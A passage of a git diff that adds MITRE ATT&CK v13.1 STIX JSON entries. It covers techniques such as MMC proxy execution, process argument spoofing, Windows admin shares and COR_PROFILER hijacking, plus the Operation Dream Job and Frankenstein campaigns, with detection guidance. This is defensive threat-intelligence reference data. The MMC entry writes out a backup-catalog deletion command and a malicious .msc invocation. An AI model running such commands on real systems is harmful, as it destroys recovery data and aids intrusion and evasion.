the reload command.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Sensor Health: Host Status", + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "created": "2019-10-04T20:42:28.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1529", + "external_id": "T1529" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "alert_TA18_106A", + "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Microsoft Shutdown Oct 2017", + "description": "Microsoft. (2017, October 15). Shutdown. 
Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json new file mode 100644 index 0000000000000000000000000000000000000000..52e692a89c795fcd4948359250daa812e1682c57 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407.json 
@@ -0,0 +1,97 @@ +{ + "type": "bundle", + "id": "bundle--825cc40c-610b-4703-bb38-e6ded61c1e12", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Wes Hurd" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "created": "2021-09-28T01:36:41.638Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1218.014", + "url": "https://attack.mitre.org/techniques/T1218/014" + }, + { + "source_name": "abusing_com_reg", + "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021." + }, + { + "source_name": "mmc_vulns", + "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/", + "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021." + }, + { + "source_name": "win_msc_files_overview", + "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/", + "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021." + }, + { + "source_name": "win_mmc", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc", + "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021." + }, + { + "source_name": "win_wbadmin_delete_catalog", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog", + "description": "Microsoft. (2017, October 16). wbadmin delete catalog. 
Retrieved September 20, 2021." + }, + { + "source_name": "win_clsid_key", + "url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm", + "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021." + }, + { + "source_name": "what_is_mmc", + "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console", + "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021." + }, + { + "source_name": "phobos_virustotal", + "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection", + "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. 
[Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", + "modified": "2022-05-20T17:41:16.112Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "MMC", + "x_mitre_detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json new file mode 100644 index 0000000000000000000000000000000000000000..6aaa499ff6bf2069bddf43639915046a45a5fba6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1.json 
@@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--f121d62d-b553-4739-a2cb-ca68e1f46611", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "type": "attack-pattern", + "created": "2021-11-19T14:13:11.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1564.010", + "url": "https://attack.mitre.org/techniques/T1564/010" + }, + { + "source_name": "Microsoft PEB 2021", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb", + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021." + }, + { + "source_name": "Xpn Argue Like Cobalt 2019", + "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/", + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021." + }, + { + "source_name": "Cobalt Strike Arguments 2019", + "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/", + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021." + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021." + }, + { + "source_name": "FireEye FiveHands April 2021", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "description": "McLellan, T. and Moore, J. 
et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021." + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021." + } + ], + "modified": "2021-11-29T15:56:50.370Z", + "name": "Process Argument Spoofing", + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. 
After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. 
Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json new file mode 100644 index 0000000000000000000000000000000000000000..3fa642b17090dd70a932b2a65bddcf7bab234fb9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffe742ed-9100-4686-9e00-c331da544787.json 
@@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--2f76d352-9abd-4edd-a57a-3065668465ac", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", + "type": "attack-pattern", + "created": "2017-05-31T21:31:00.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1077", + "url": "https://attack.mitre.org/techniques/T1077" + }, + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "url": "https://en.wikipedia.org/wiki/Server_Message_Block", + "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", + "source_name": "Wikipedia SMB" + }, + { + "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx", + "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", + "source_name": "TechNet RPC" + }, + { + "url": "http://support.microsoft.com/kb/314984", + "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", + "source_name": "Microsoft Admin Shares" + }, + { + "url": "https://technet.microsoft.com/bb490717.aspx", + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "source_name": "Technet Net Use" + }, + { + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts", + "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. 
Retrieved February 1, 2016.", + "source_name": "Lateral Movement Payne" + }, + { + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem", + "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", + "source_name": "Windows Event Forwarding Payne" + }, + { + "source_name": "Medium Detecting Lateral Movement", + "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc", + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019." + } + ], + "modified": "2020-03-23T19:54:12.651Z", + "name": "Windows Admin Shares", + "description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. 
(Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting Lateral Movement)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_system_requirements": [ + "File and printer sharing over SMB enabled.\nHost/network firewalls not blocking SMB ports between source and destination.\nUse of domain account in administrator group on remote system or default system admin account." + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json new file mode 100644 index 0000000000000000000000000000000000000000..a221744a943a6643d7e3677494532b0b600bc098 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335.json 
@@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--ecf60e03-838a-4b79-9f95-8d4f2e1c346a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Jesse Brown, Red Canary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "type": "attack-pattern", + "created": "2020-06-24T22:30:55.843Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1574.012", + "url": "https://attack.mitre.org/techniques/T1574/012" + }, + { + "source_name": "Microsoft Profiling Mar 2017", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview", + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020." + }, + { + "source_name": "Microsoft COR_PROFILER Feb 2013", + "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)", + "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020." + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020." + }, + { + "source_name": "Red Canary COR_PROFILER May 2020", + "url": "https://redcanary.com/blog/cor_profiler-for-persistence/", + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020." + }, + { + "source_name": "Almond COR_PROFILER Apr 2019", + "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html", + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. 
Retrieved June 24, 2020." + }, + { + "source_name": "GitHub OmerYa Invisi-Shell", + "url": "https://github.com/OmerYa/Invisi-Shell", + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020." + }, + { + "source_name": "subTee .NET Profilers May 2017", + "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html", + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020." + } + ], + "modified": "2021-08-30T21:35:12.049Z", + "name": "COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. 
The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. 
For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Module: Module Load", + "Command: Command Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json new file mode 100644 index 0000000000000000000000000000000000000000..7ba70e08f2483b8fb817893446ec273843653325 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b.json 
@@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--13c27197-2215-4076-af13-ef7ee3967b6e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T19:18:19.033Z", + "name": "Operation Dream Job", + "description": "[Operation Dream Job](https://attack.mitre.org/campaigns/C0022) was a cyber espionage operation likely conducted by [Lazarus Group](https://attack.mitre.org/groups/G0032) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://attack.mitre.org/campaigns/C0022) as an umbrella term covering both Operation Interception and Operation North Star.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)(Citation: The Hacker News Lazarus Aug 2022)", + "aliases": [ + "Operation Dream Job", + "Operation North Star", + "Operation Interception" + ], + "first_seen": "2019-09-01T04:00:00.000Z", + "last_seen": "2020-08-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Lazarus Jun 2020)", + "x_mitre_last_seen_citation": "(Citation: ClearSky Lazarus Aug 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--0257b35b-93ef-4a70-80dd-ad5258e6045b", + "created": "2023-03-17T13:37:42.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0022", + "external_id": "C0022" + }, + { + "source_name": 
"Operation Interception", + "description": "(Citation: ESET Lazarus Jun 2020)" + }, + { + "source_name": "Operation North Star", + "description": "(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)" + }, + { + "source_name": "McAfee Lazarus Nov 2020", + "description": "Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" + }, + { + "source_name": "ESET Lazarus Jun 2020", + "description": "Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" + }, + { + "source_name": "McAfee Lazarus Jul 2020", + "description": "Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27" + }, + { + "source_name": "ClearSky Lazarus Aug 2020", + "description": "ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + }, + { + "source_name": "The Hacker News Lazarus Aug 2022", + "description": "Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. 
Retrieved April 10, 2023.", + "url": "https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json new file mode 100644 index 0000000000000000000000000000000000000000..d5aa480001bc0de4bd803e8ad9dab3575bd9b46f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--26d9ebae-de59-427f-ae9a-349456bae4b1.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b8e6c25f-7402-46d2-953c-14c4c2231915", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:55:03.775Z", + "name": "Frankenstein", + "description": "[Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019)", + "aliases": [ + "Frankenstein" + ], + "first_seen": "2019-01-01T06:00:00.000Z", + "last_seen": "2019-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Talos Frankenstein June 2019)", + "x_mitre_last_seen_citation": "(Citation: Talos Frankenstein June 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "campaign", + "id": "campaign--26d9ebae-de59-427f-ae9a-349456bae4b1", + "created": "2022-09-07T13:40:09.750Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0001", + "external_id": "C0001" + }, + { + "source_name": "Talos Frankenstein June 2019", + "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. 
